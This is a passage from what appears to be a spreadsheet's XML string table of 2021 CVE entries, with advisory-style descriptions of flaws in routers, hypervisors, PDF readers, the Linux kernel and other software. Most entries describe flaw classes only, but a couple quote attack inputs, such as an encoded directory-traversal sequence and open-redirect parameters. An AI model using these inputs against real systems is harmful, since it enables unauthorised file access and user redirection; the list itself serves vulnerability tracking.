    <t>Multiple vulnerabilities in the web-based management interface of the Cisco Catalyst Passive Optical Network (PON) Series Switches Optical Network Terminal (ONT) could allow an unauthenticated, remote attacker to perform the following actions: Log in with a default credential if the Telnet protocol is enabled Perform command injection Modify the configuration For more information about these vulnerabilities, see the Details section of this advisory.</t>
  </si>
  <si>
    <t>CVE-2021-34797</t>
  </si>
  <si>
    <t>Apache Geode versions up to 1.12.4 and 1.13.4 are vulnerable to a log file redaction of sensitive information flaw when using values that begin with characters other than letters or numbers for passwords and security properties with the prefix "sysprop-", "javax.net.ssl", or "security-". This issue is fixed by overhauling the log file redaction in Apache Geode versions 1.12.5, 1.13.5, and 1.14.0.</t>
  </si>
  <si>
    <t>CVE-2021-34798</t>
  </si>
  <si>
    <t>Malformed requests may cause the server to dereference a NULL pointer. This issue affects Apache HTTP Server 2.4.48 and earlier.</t>
  </si>
  <si>
    <t>CVE-2021-3480</t>
  </si>
  <si>
    <t>A flaw was found in slapi-nis in versions before 0.56.7. A NULL pointer dereference during the parsing of the Binding DN could allow an unauthenticated attacker to crash the 389-ds-base directory server. The highest threat from this vulnerability is to system availability.</t>
  </si>
  <si>
    <t>CVE-2021-34800</t>
  </si>
  <si>
    <t>Sensitive information could be logged. The following products are affected: Acronis Agent (Windows, Linux, macOS) before build 27147</t>
  </si>
  <si>
    <t>CVE-2021-34801</t>
  </si>
  <si>
    <t>Valine 1.4.14 allows remote attackers to cause a denial of service (application outage) by supplying a ua (aka User-Agent) value that only specifies the product and version.</t>
  </si>
  <si>
    <t>CVE-2021-34802</t>
  </si>
  <si>
    <t>A failure in resetting the security context in some transaction actions in Neo4j Graph Database 4.2 and 4.3 could allow authenticated users to execute commands with elevated privileges.</t>
  </si>
  <si>
    <t>CVE-2021-34803</t>
  </si>
  <si>
    <t>TeamViewer before 14.7.48644 on Windows loads untrusted DLLs in certain situations.</t>
  </si>
  <si>
    <t>CVE-2021-34805</t>
  </si>
  <si>
    <t>An issue was discovered in FAUST iServer before 9.0.019.019.7. For each URL request, it accesses the corresponding .fau file on the operating system without preventing %2e%2e%5c directory traversal.</t>
  </si>
  <si>
    <t>CVE-2021-34807</t>
  </si>
  <si>
    <t>An open redirect vulnerability exists in the /preauth Servlet in Zimbra Collaboration Suite through 9.0. To exploit the vulnerability, an attacker would need to have obtained a valid zimbra auth token or a valid preauth token. Once the token is obtained, an attacker could redirect a user to any URL via isredirect=1&amp;redirectURL= in conjunction with the token data (e.g., a valid authtoken= value).</t>
  </si>
  <si>
    <t>CVE-2021-34808</t>
  </si>
  <si>
    <t>Server-Side Request Forgery (SSRF) vulnerability in cgi component in Synology Media Server before 1.8.3-2881 allows remote attackers to access intranet resources via unspecified vectors.</t>
  </si>
  <si>
    <t>CVE-2021-34809</t>
  </si>
  <si>
    <t>Improper neutralization of special elements used in a command ('Command Injection') vulnerability in task management component in Synology Download Station before 3.8.16-3566 allows remote authenticated users to execute arbitrary code via unspecified vectors.</t>
  </si>
  <si>
    <t>CVE-2021-3481</t>
  </si>
  <si>
    <t>A flaw was found in Qt. An out-of-bounds read vulnerability was found in QRadialFetchSimd in qt/qtbase/src/gui/painting/qdrawhelper_p.h in Qt/Qtbase. While rendering and displaying a crafted Scalable Vector Graphics (SVG) file this flaw may lead to an unauthorized memory access. The highest threat from this vulnerability is to data confidentiality and the application availability.</t>
  </si>
  <si>
    <t>CVE-2021-34810</t>
  </si>
  <si>
    <t>Improper privilege management vulnerability in cgi component in Synology Download Station before 3.8.16-3566 allows remote authenticated users to execute arbitrary code via unspecified vectors.</t>
  </si>
  <si>
    <t>CVE-2021-34811</t>
  </si>
  <si>
    <t>Server-Side Request Forgery (SSRF) vulnerability in task management component in Synology Download Station before 3.8.16-3566 allows remote authenticated users to access intranet resources via unspecified vectors.</t>
  </si>
  <si>
    <t>CVE-2021-34812</t>
  </si>
  <si>
    <t>Use of hard-coded credentials vulnerability in php component in Synology Calendar before 2.4.0-0761 allows remote attackers to obtain sensitive information via unspecified vectors.</t>
  </si>
  <si>
    <t>CVE-2021-34813</t>
  </si>
  <si>
    <t>Matrix libolm before 3.2.3 allows a malicious Matrix homeserver to crash a client (while it is attempting to retrieve an Olm encrypted room key backup from the homeserver) because olm_pk_decrypt has a stack-based buffer overflow. Remote code execution might be possible for some nonstandard build configurations.</t>
  </si>
  <si>
    <t>CVE-2021-34814</t>
  </si>
  <si>
    <t>Proofpoint Spam Engine before 8.12.0-2106240000 has a Security Control Bypass.</t>
  </si>
  <si>
    <t>CVE-2021-34815</t>
  </si>
  <si>
    <t>CheckSec Canopy before 3.5.2 allows XSS attacks against the login page via the LOGIN_PAGE_DISCLAIMER parameter.</t>
  </si>
  <si>
    <t>CVE-2021-34816</t>
  </si>
  <si>
    <t>An Argument Injection issue in the plugin management of Etherpad 1.8.13 allows privileged users to execute arbitrary code on the server by installing plugins from an attacker-controlled source.</t>
  </si>
  <si>
    <t>CVE-2021-34817</t>
  </si>
  <si>
    <t>A Cross-Site Scripting (XSS) issue in the chat component of Etherpad 1.8.13 allows remote attackers to inject arbitrary JavaScript or HTML by importing a crafted pad.</t>
  </si>
  <si>
    <t>CVE-2021-3482</t>
  </si>
  <si>
    <t>A flaw was found in Exiv2 in versions before and including 0.27.4-RC1. Improper input validation of the rawData.size property in Jp2Image::readMetadata() in jp2image.cpp can lead to a heap-based buffer overflow via a crafted JPG image containing malicious EXIF data.</t>
  </si>
  <si>
    <t>CVE-2021-34820</t>
  </si>
  <si>
    <t>Web Path Directory Traversal in the Novus HTTP Server. The Novus HTTP Server is affected by the Directory Traversal for Arbitrary File Access vulnerability. A remote, unauthenticated attacker using an HTTP GET request may be able to exploit this issue to access sensitive data. The issue was discovered in the NMS (Novus Management System) software through 1.51.2</t>
  </si>
  <si>
    <t>CVE-2021-34821</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) vulnerability exists in AAT Novus Management System through 1.51.2. The WebUI has wrong HTTP 404 error handling implemented. A remote, unauthenticated attacker may be able to exploit the issue by sending malicious HTTP requests to non-existing URIs. The value of the URL path filename is copied into the HTML document as plain text tags.</t>
  </si>
  <si>
    <t>CVE-2021-34823</t>
  </si>
  <si>
    <t>The ON24 ScreenShare (aka DesktopScreenShare.app) plugin before 2.0 for macOS allows remote file access via its built-in HTTP server. This allows unauthenticated remote users to retrieve files accessible to the logged-on macOS user. When a remote user sends a crafted HTTP request to the server, it triggers a code path that will download a configuration file from a specified remote machine over HTTP. There is an XXE flaw in processing of this configuration file that allows reading local (to macOS) files and uploading them to remote machines.</t>
  </si>
  <si>
    <t>CVE-2021-34824</t>
  </si>
  <si>
    <t>Istio (1.8.x, 1.9.0-1.9.5 and 1.10.0-1.10.1) contains a remotely exploitable vulnerability where credentials specified in the Gateway and DestinationRule credentialName field can be accessed from different namespaces.</t>
  </si>
  <si>
    <t>CVE-2021-34825</t>
  </si>
  <si>
    <t>Quassel through 0.13.1, when --require-ssl is enabled, launches without SSL or TLS support if a usable X.509 certificate is not found on the local system.</t>
  </si>
  <si>
    <t>CVE-2021-34827</t>
  </si>
  <si>
    <t>This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-1330 1.13B01 BETA routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of the SOAPAction HTTP header. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of the device. Was ZDI-CAN-12029.</t>
  </si>
  <si>
    <t>CVE-2021-34828</t>
  </si>
  <si>
    <t>This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-1330 1.13B01 BETA routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of the SOAPAction HTTP header. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length buffer. An attacker can leverage this vulnerability to execute code in the context of the device. Was ZDI-CAN-12066.</t>
  </si>
  <si>
    <t>CVE-2021-34829</t>
  </si>
  <si>
    <t>This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-1330 1.13B01 BETA routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of the HNAP_AUTH HTTP header. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length buffer. An attacker can leverage this vulnerability to execute code in the context of the device. Was ZDI-CAN-12065.</t>
  </si>
  <si>
    <t>CVE-2021-3483</t>
  </si>
  <si>
    <t>A flaw was found in the Nosy driver in the Linux kernel. This issue allows a device to be inserted twice into a doubly-linked list, leading to a use-after-free when one of these devices is removed. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability. Versions before kernel 5.12-rc6 are affected</t>
  </si>
  <si>
    <t>CVE-2021-34830</t>
  </si>
  <si>
    <t>This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-1330 1.13B01 BETA routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of the Cookie HTTP header. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of the device. Was ZDI-CAN-12028.</t>
  </si>
  <si>
    <t>CVE-2021-34831</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit Reader 10.1.4.37651. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of Document objects. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-13741.</t>
  </si>
  <si>
    <t>CVE-2021-34832</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the delay property. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-13928.</t>
  </si>
  <si>
    <t>CVE-2021-34833</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23.</t>
  </si>
  <si>
    <t>CVE-2021-34834</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14.</t>
  </si>
  <si>
    <t>CVE-2021-34835</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15.</t>
  </si>
  <si>
    <t>CVE-2021-34836</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17.</t>
  </si>
  <si>
    <t>CVE-2021-34837</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18.</t>
  </si>
  <si>
    <t>CVE-2021-34838</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19.</t>
  </si>
  <si>
    <t>CVE-2021-34839</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20.</t>
  </si>
  <si>
    <t>CVE-2021-34840</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21.</t>
  </si>
  <si>
    <t>CVE-2021-34841</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22.</t>
  </si>
  <si>
    <t>CVE-2021-34842</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24.</t>
  </si>
  <si>
    <t>CVE-2021-34843</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25.</t>
  </si>
  <si>
    <t>CVE-2021-34844</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33.</t>
  </si>
  <si>
    <t>CVE-2021-34845</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34.</t>
  </si>
  <si>
    <t>CVE-2021-34846</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120.</t>
  </si>
  <si>
    <t>CVE-2021-34847</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270.</t>
  </si>
  <si>
    <t>CVE-2021-34848</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532.</t>
  </si>
  <si>
    <t>CVE-2021-34849</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531.</t>
  </si>
  <si>
    <t>CVE-2021-3485</t>
  </si>
  <si>
    <t>An Improper Input Validation vulnerability in the Product Update feature of Bitdefender Endpoint Security Tools for Linux allows a man-in-the-middle attacker to abuse the DownloadFile function of the Product Update to achieve remote code execution. This issue affects: Bitdefender Endpoint Security Tools for Linux versions prior to 6.2.21.155.</t>
  </si>
  <si>
    <t>CVE-2021-34850</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529.</t>
  </si>
  <si>
    <t>CVE-2021-34851</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16.</t>
  </si>
  <si>
    <t>CVE-2021-34852</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3929.</t>
  </si>
  <si>
    <t>CVE-2021-34853</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit PDF Reader 11.0.0.49893. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of Annotation objects. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-14013.</t>
  </si>
  <si>
    <t>CVE-2021-34854</t>
  </si>
  <si>
    <t>This vulnerability allows local attackers to escalate privileges on affected installations of Parallels Desktop 16.1.3 (49160). An attacker must first obtain the ability to execute low-privileged code on the target guest system in order to exploit this vulnerability. The specific flaw exists within the Toolgate component. The issue results from the lack of proper validation of user-supplied data, which can result in an uncontrolled memory allocation. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of the hypervisor. Was ZDI-CAN-13544.</t>
  </si>
  <si>
    <t>CVE-2021-34855</t>
  </si>
  <si>
    <t>This vulnerability allows local attackers to disclose sensitive information on affected installations of Parallels Desktop 16.1.3 (49160). An attacker must first obtain the ability to execute low-privileged code on the target guest system in order to exploit this vulnerability. The specific flaw exists within the Toolgate component. The issue results from the lack of proper initialization of memory prior to accessing it. An attacker can leverage this in conjunction with other vulnerabilities to escalate privileges and execute arbitrary code in the context of the hypervisor. Was ZDI-CAN-13592.</t>
  </si>
  <si>
    <t>CVE-2021-34856</t>
  </si>
  <si>
    <t>This vulnerability allows local attackers to escalate privileges on affected installations of Parallels Desktop 16.1.3 (49160). An attacker must first obtain the ability to execute high-privileged code on the target guest system in order to exploit this vulnerability. The specific flaw exists within the virtio-gpu virtual device. The issue results from the lack of proper validation of user-supplied data, which can result in a memory corruption condition. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of the hypervisor. Was ZDI-CAN-13581.</t>
  </si>
  <si>
    <t>CVE-2021-34857</t>
  </si>
  <si>
    <t>This vulnerability allows local attackers to escalate privileges on affected installations of Parallels Desktop 16.1.3 (49160). An attacker must first obtain the ability to execute high-privileged code on the target guest system in order to exploit this vulnerability. The specific flaw exists within the Toolgate component. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of the hypervisor. Was ZDI-CAN-13601.</t>
  </si>
  <si>
    <t>CVE-2021-34858</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of TeamViewer. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of TVS files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated structure. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-13606.</t>
  </si>
  <si>
    <t>CVE-2021-34859</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of TeamViewer 15.16.8.0. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of TVS files. The issue results from the lack of proper validation of user-supplied data, which can result in a memory corruption condition. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-13697.</t>
  </si>
  <si>
    <t>CVE-2021-3486</t>
  </si>
  <si>
    <t>GLPi 9.5.4 does not sanitize the metadata. This way its possible to insert XSS into plugins to execute JavaScript code.</t>
  </si>
  <si>
    <t>CVE-2021-34860</t>
  </si>
  <si>
    <t>This vulnerability allows network-adjacent attackers to disclose sensitive information on affected installations of D-Link DAP-2020 1.01rc001 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of the getpage parameter provided to the webproc endpoint. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to disclose information in the context of root. Was ZDI-CAN-12103.</t>
  </si>
  <si>
    <t>CVE-2021-34861</t>
  </si>
  <si>
    <t>This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2020 1.01rc001 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the webproc endpoint, which listens on TCP port 80 by default. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-12104.</t>
  </si>
  <si>
    <t>CVE-2021-34862</t>
  </si>
  <si>
    <t>This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2020 1.01rc001 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of the var:menu parameter provided to the webproc endpoint. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-13270.</t>
  </si>
  <si>
    <t>CVE-2021-34863</t>
  </si>
  <si>
    <t>This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2020 1.01rc001 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of the var:page parameter provided to the webproc endpoint. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-13271.</t>
  </si>
  <si>
    <t>CVE-2021-34864</t>
  </si>
  <si>
    <t>This vulnerability allows local attackers to escalate privileges on affected installations of Parallels Desktop 16.1.3 (49160). An attacker must first obtain the ability to execute low-privileged code on the target guest system in order to exploit this vulnerability. The specific flaw exists within the WinAppHelper component. The issue results from the lack of proper access control. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of the hypervisor. Was ZDI-CAN-13543.</t>
  </si>
  <si>
    <t>CVE-2021-34865</t>
  </si>
  <si>
    <t>This vulnerability allows network-adjacent attackers to bypass authentication on affected installations of multiple NETGEAR routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the mini_httpd service, which listens on TCP port 80 by default. The issue results from incorrect string matching logic when accessing protected pages. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of root. Was ZDI-CAN-13313.</t>
  </si>
  <si>
    <t>CVE-2021-34866</t>
  </si>
  <si>
    <t>This vulnerability allows local attackers to escalate privileges on affected installations of Linux Kernel 5.14-rc3. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the handling of eBPF programs. The issue results from the lack of proper validation of user-supplied eBPF programs, which can result in a type confusion condition. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of the kernel. Was ZDI-CAN-14689.</t>
  </si>
  <si>
    <t>CVE-2021-34867</t>
  </si>
  <si>
    <t>This vulnerability allows local attackers to escalate privileges on affected installations of Parallels Desktop 16.1.3-49160. An attacker must first obtain the ability to execute high-privileged code on the target guest system in order to exploit this vulnerability. The specific flaw exists within the Toolgate component. The issue results from the lack of proper validation of user-supplied data, which can result in an uncontrolled memory allocation. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of the hypervisor. Was ZDI-CAN-13672.</t>
  </si>
  <si>
    <t>CVE-2021-34868</t>
  </si>
  <si>
    <t>This vulnerability allows local attackers to escalate privileges on affected installations of Parallels Desktop 16.1.3-49160. An attacker must first obtain the ability to execute low-privileged code on the target guest system in order to exploit this vulnerability. The specific flaw exists within the Toolgate component. The issue results from the lack of proper validation of user-supplied data, which can result in an uncontrolled memory allocation. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of the hypervisor. Was ZDI-CAN-13712.</t>
  </si>
  <si>
    <t>CVE-2021-34869</t>
  </si>
  <si>
    <t>This vulnerability allows local attackers to escalate privileges on affected installations of Parallels Desktop 16.1.3-49160. An attacker must first obtain the ability to execute low-privileged code on the target guest system in order to exploit this vulnerability. The specific flaw exists within the Toolgate component. The issue results from the lack of proper validation of user-supplied data, which can result in an uncontrolled memory allocation. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of the hypervisor. Was ZDI-CAN-13797.</t>
  </si>
  <si>
    <t>CVE-2021-3487</t>
  </si>
  <si>
    <t>There's a flaw in the BFD library of binutils in versions before 2.36. An attacker who supplies a crafted file to an application linked with BFD, and using the DWARF functionality, could cause an impact to system availability by way of excessive memory consumption.</t>
  </si>
  <si>
    <t>CVE-2021-34870</t>
  </si>
  <si>
    <t>This vulnerability allows network-adjacent attackers to disclose sensitive information on affected installations of NETGEAR XR1000 1.0.0.52_1.0.38 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the processing of SOAP messages. The issue results from a lack of authentication required for a privileged request. An attacker can leverage this vulnerability to disclose stored credentials, leading to further compromise. Was ZDI-CAN-13325.</t>
  </si>
  <si>
    <t>CVE-2021-34871</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BMP files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-14695.</t>
  </si>
  <si>
    <t>CVE-2021-34872</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SKP files. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-14737.</t>
  </si>
  <si>
    <t>CVE-2021-34873</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PDF files. Crafted data in a PDF file can trigger a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-14696.</t>
  </si>
  <si>
    <t>CVE-2021-34874</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rocessing of 3DS files. The issue results from the lack of proper validation of user-supplied data, which can result in a memory corruption condition. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-14736.</t>
  </si>
  <si>
    <t>CVE-2021-34875</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3DS files. Crafted data in a 3DS file can trigger a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-14827.</t>
  </si>
  <si>
    <t>CVE-2021-34876</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828.</t>
  </si>
  <si>
    <t>CVE-2021-34877</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829.</t>
  </si>
  <si>
    <t>CVE-2021-34878</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830.</t>
  </si>
  <si>
    <t>CVE-2021-34879</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2K files. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-14832.</t>
  </si>
  <si>
    <t>CVE-2021-34880</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3DS files. Crafted data in a 3DS file can trigger a read past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-14833.</t>
  </si>
  <si>
    <t>CVE-2021-34881</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OBJ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4834.</t>
  </si>
  <si>
    <t>CVE-2021-34882</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JP2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4835.</t>
  </si>
  <si>
    <t>CVE-2021-34883</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J2K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4836.</t>
  </si>
  <si>
    <t>CVE-2021-34884</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JP2 files. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the current process. Was ZDI-CAN-14837.</t>
  </si>
  <si>
    <t>CVE-2021-34885</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read past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-14838.</t>
  </si>
  <si>
    <t>CVE-2021-34886</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FBX files. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the current process. Was ZDI-CAN-14839.</t>
  </si>
  <si>
    <t>CVE-2021-34887</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PDF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4840.</t>
  </si>
  <si>
    <t>CVE-2021-34888</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JT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4841.</t>
  </si>
  <si>
    <t>CVE-2021-34889</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3DS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4842.</t>
  </si>
  <si>
    <t>CVE-2021-3489</t>
  </si>
  <si>
    <t>The eBPF RINGBUF bpf_ringbuf_reserve() function in the Linux kernel did not check that the allocated size was smaller than the ringbuf size, allowing an attacker to perform out-of-bounds writes within the kernel and therefore, arbitrary code execution. This issue was fixed via commit 4b81ccebaeee ("bpf, ringbuf: Deny reserve of buffers larger than ringbuf") (v5.13-rc4) and backported to the stable kernels in v5.12.4, v5.11.21, and v5.10.37. It was introduced via 457f44363a88 ("bpf: Implement BPF ring buffer and verifier support for it") (v5.8-rc1).</t>
  </si>
  <si>
    <t>CVE-2021-34890</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JT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4843.</t>
  </si>
  <si>
    <t>CVE-2021-34891</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4844.</t>
  </si>
  <si>
    <t>CVE-2021-34892</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proper validation of the length of user-supplied data prior to copying it to a stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-14845.</t>
  </si>
  <si>
    <t>CVE-2021-34893</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BMP files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-14846.</t>
  </si>
  <si>
    <t>CVE-2021-34894</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3DS files. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-14847.</t>
  </si>
  <si>
    <t>CVE-2021-34895</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3DS files. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-14862.</t>
  </si>
  <si>
    <t>CVE-2021-34896</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BMP files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-14863.</t>
  </si>
  <si>
    <t>CVE-2021-34897</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DGN files. Crafted data in a DGN file can trigger a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-14864.</t>
  </si>
  <si>
    <t>CVE-2021-34898</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865.</t>
  </si>
  <si>
    <t>CVE-2021-34899</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866.</t>
  </si>
  <si>
    <t>CVE-2021-3490</t>
  </si>
  <si>
    <t>The eBPF ALU32 bounds tracking for bitwise ops (AND, OR and XOR) in the Linux kernel did not properly update 32-bit bounds, which could be turned into out of bounds reads and writes in the Linux kernel and therefore, arbitrary code execution. This issue was fixed via commit 049c4e13714e ("bpf: Fix alu32 const subreg bound tracking on bitwise operations") (v5.13-rc4) and backported to the stable kernels in v5.12.4, v5.11.21, and v5.10.37. The AND/OR issues were introduced by commit 3f50f132d840 ("bpf: Verifier, do explicit ALU32 bounds tracking") (5.7-rc1) and the XOR variant was introduced by 2921c90d4718 ("bpf:Fix a verifier failure with xor") ( 5.10-rc1).</t>
  </si>
  <si>
    <t>CVE-2021-34900</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2K files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-14867.</t>
  </si>
  <si>
    <t>CVE-2021-34901</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3DS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4874.</t>
  </si>
  <si>
    <t>CVE-2021-34902</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DWG file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14875.</t>
  </si>
  <si>
    <t>CVE-2021-34903</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BMP files. Crafted data in a BMP file can trigger a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-14876.</t>
  </si>
  <si>
    <t>CVE-2021-34904</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DGN files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-14877.</t>
  </si>
  <si>
    <t>CVE-2021-34905</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DGN files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-14878.</t>
  </si>
  <si>
    <t>CVE-2021-34906</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2K files. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-14879.</t>
  </si>
  <si>
    <t>CVE-2021-34907</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BMP files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-14880.</t>
  </si>
  <si>
    <t>CVE-2021-34908</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2K files. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-14881.</t>
  </si>
  <si>
    <t>CVE-2021-34909</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4882.</t>
  </si>
  <si>
    <t>CVE-2021-3491</t>
  </si>
  <si>
    <t>The io_uring subsystem in the Linux kernel allowed the MAX_RW_COUNT limit to be bypassed in the PROVIDE_BUFFERS operation, which led to negative values being usedin mem_rw when reading /proc/&lt;PID&gt;/mem. This could be used to create a heap overflow leading to arbitrary code execution in the kernel. It was addressed via commit d1f82808877b ("io_uring: truncate lengths larger than MAX_RW_COUNT on provide buffers") (v5.13-rc1) and backported to the stable kernels in v5.12.4, v5.11.21, and v5.10.37. It was introduced in ddf0322db79c ("io_uring: add IORING_OP_PROVIDE_BUFFERS") (v5.7-rc1).</t>
  </si>
  <si>
    <t>CVE-2021-34910</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DGN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4883.</t>
  </si>
  <si>
    <t>CVE-2021-34911</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3DS files. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-14884.</t>
  </si>
  <si>
    <t>CVE-2021-34912</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read past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-14885.</t>
  </si>
  <si>
    <t>CVE-2021-34913</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read past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-14831.</t>
  </si>
  <si>
    <t>CVE-2021-34914</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DGN files. Crafted data in a DGN file can trigger a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-14892.</t>
  </si>
  <si>
    <t>CVE-2021-34915</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2K files. Crafted data in a J2K file can trigger a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-14893.</t>
  </si>
  <si>
    <t>CVE-2021-34916</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DWG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4894.</t>
  </si>
  <si>
    <t>CVE-2021-34917</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2K files. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-14895.</t>
  </si>
  <si>
    <t>CVE-2021-34918</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P2 files. Crafted data in a JP2 file can trigger a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-14896.</t>
  </si>
  <si>
    <t>CVE-2021-34919</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P2 files. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-14897.</t>
  </si>
  <si>
    <t>CVE-2021-3492</t>
  </si>
  <si>
    <t>Shiftfs, an out-of-tree stacking file system included in Ubuntu Linux kernels, did not properly handle faults occurring during copy_from_user() correctly. These could lead to either a double-free situation or memory not being freed at all. An attacker could use this to cause a denial of service (kernel memory exhaustion) or gain privileges via executing arbitrary code. AKA ZDI-CAN-13562.</t>
  </si>
  <si>
    <t>CVE-2021-34920</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898.</t>
